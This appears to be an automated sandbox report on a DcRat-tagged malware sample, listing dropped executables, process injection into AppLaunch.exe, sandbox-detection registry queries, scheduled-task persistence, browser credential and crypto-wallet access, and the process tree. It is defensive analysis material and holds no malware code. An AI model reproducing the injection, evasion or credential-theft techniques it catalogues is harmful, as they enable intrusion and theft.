dcrat | 8369e11ed910a178f6ec9142ba80a09623fb49f97bd5b40506921ae9394dec8c

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	D9A4.exe

Executes dropped EXE 10 IoCs

pid	Process
5056	D5C9.exe
676	D6C4.exe
4184	D9A4.exe
4064	DD4F.exe
5000	F3C6.exe
2696	ss41.exe
3172	toolspub2.exe
4992	31839b57a4f11171d6abc8bbc4451ee4.exe
4180	toolspub2.exe
2992	31839b57a4f11171d6abc8bbc4451ee4.exe

Loads dropped DLL 1 IoCs

pid	Process
2268	regsvr32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3644 set thread context of 316	3644	8369e11ed910a178f6ec9142ba80a09623fb49f97bd5b40506921ae9394dec8c.exe	82
PID 4064 set thread context of 2172	4064	DD4F.exe	95
PID 3172 set thread context of 4180	3172	toolspub2.exe	111

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
4160	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
316	AppLaunch.exe
316	AppLaunch.exe
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found
3276	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3276	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
316	AppLaunch.exe
4180	toolspub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1592	msedge.exe
1592	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeDebugPrivilege	4064	DD4F.exe
Token: SeDebugPrivilege	2172	aspnet_compiler.exe
Token: SeDebugPrivilege	5056	D5C9.exe
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeDebugPrivilege	676	D6C4.exe
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeShutdownPrivilege	3276	Process not Found
Token: SeCreatePagefilePrivilege	3276	Process not Found
Token: SeDebugPrivilege	4992	31839b57a4f11171d6abc8bbc4451ee4.exe

Suspicious use of FindShellTrayWindow 53 IoCs

pid	Process
3276	Process not Found
3276	Process not Found
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
1592	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3644 wrote to memory of 316	3644	8369e11ed910a178f6ec9142ba80a09623fb49f97bd5b40506921ae9394dec8c.exe	82
PID 3644 wrote to memory of 316	3644	8369e11ed910a178f6ec9142ba80a09623fb49f97bd5b40506921ae9394dec8c.exe	82
PID 3644 wrote to memory of 316	3644	8369e11ed910a178f6ec9142ba80a09623fb49f97bd5b40506921ae9394dec8c.exe	82
PID 3644 wrote to memory of 316	3644	8369e11ed910a178f6ec9142ba80a09623fb49f97bd5b40506921ae9394dec8c.exe	82
PID 3644 wrote to memory of 316	3644	8369e11ed910a178f6ec9142ba80a09623fb49f97bd5b40506921ae9394dec8c.exe	82
PID 3644 wrote to memory of 316	3644	8369e11ed910a178f6ec9142ba80a09623fb49f97bd5b40506921ae9394dec8c.exe	82
PID 3276 wrote to memory of 5056	3276	Process not Found	87
PID 3276 wrote to memory of 5056	3276	Process not Found	87
PID 3276 wrote to memory of 5056	3276	Process not Found	87
PID 3276 wrote to memory of 676	3276	Process not Found	88
PID 3276 wrote to memory of 676	3276	Process not Found	88
PID 3276 wrote to memory of 676	3276	Process not Found	88
PID 3276 wrote to memory of 4184	3276	Process not Found	90
PID 3276 wrote to memory of 4184	3276	Process not Found	90
PID 3276 wrote to memory of 4184	3276	Process not Found	90
PID 3276 wrote to memory of 3460	3276	Process not Found	113
PID 3276 wrote to memory of 3460	3276	Process not Found	113
PID 3276 wrote to memory of 4064	3276	Process not Found	93
PID 3276 wrote to memory of 4064	3276	Process not Found	93
PID 4184 wrote to memory of 2268	4184	D9A4.exe	94
PID 4184 wrote to memory of 2268	4184	D9A4.exe	94
PID 4184 wrote to memory of 2268	4184	D9A4.exe	94
PID 4064 wrote to memory of 2172	4064	DD4F.exe	95
PID 4064 wrote to memory of 2172	4064	DD4F.exe	95
PID 4064 wrote to memory of 2172	4064	DD4F.exe	95
PID 4064 wrote to memory of 2172	4064	DD4F.exe	95
PID 4064 wrote to memory of 2172	4064	DD4F.exe	95
PID 4064 wrote to memory of 2172	4064	DD4F.exe	95
PID 3276 wrote to memory of 5000	3276	Process not Found	96
PID 3276 wrote to memory of 5000	3276	Process not Found	96
PID 3276 wrote to memory of 5000	3276	Process not Found	96
PID 3460 wrote to memory of 1592	3460	msedge.exe	97
PID 3460 wrote to memory of 1592	3460	msedge.exe	97
PID 5000 wrote to memory of 2696	5000	Process not Found	99
PID 5000 wrote to memory of 2696	5000	Process not Found	99
PID 5000 wrote to memory of 3172	5000	Process not Found	100
PID 5000 wrote to memory of 3172	5000	Process not Found	100
PID 5000 wrote to memory of 3172	5000	Process not Found	100
PID 5000 wrote to memory of 4992	5000	Process not Found	101
PID 5000 wrote to memory of 4992	5000	Process not Found	101
PID 5000 wrote to memory of 4992	5000	Process not Found	101
PID 1592 wrote to memory of 4712	1592	msedge.exe	102
PID 1592 wrote to memory of 4712	1592	msedge.exe	102
PID 3460 wrote to memory of 232	3460	msedge.exe	103
PID 3460 wrote to memory of 232	3460	msedge.exe	103
PID 232 wrote to memory of 1460	232	msedge.exe	104
PID 232 wrote to memory of 1460	232	msedge.exe	104
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105
PID 1592 wrote to memory of 3792	1592	msedge.exe	105

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\8369e11ed910a178f6ec9142ba80a09623fb49f97bd5b40506921ae9394dec8c.exe
"C:\Users\Admin\AppData\Local\Temp\8369e11ed910a178f6ec9142ba80a09623fb49f97bd5b40506921ae9394dec8c.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3644
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - DcRat
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:316

C:\Users\Admin\AppData\Local\Temp\D5C9.exe
C:\Users\Admin\AppData\Local\Temp\D5C9.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5056

C:\Users\Admin\AppData\Local\Temp\D6C4.exe
C:\Users\Admin\AppData\Local\Temp\D6C4.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Users\Admin\AppData\Local\Temp\D9A4.exe
C:\Users\Admin\AppData\Local\Temp\D9A4.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4184
- C:\Windows\SysWOW64\regsvr32.exe
  "C:\Windows\System32\regsvr32.exe" A1DK_.aX3 -S
  2⤵
  - Loads dropped DLL
  PID:2268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DABE.bat" "
1⤵
PID:3460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
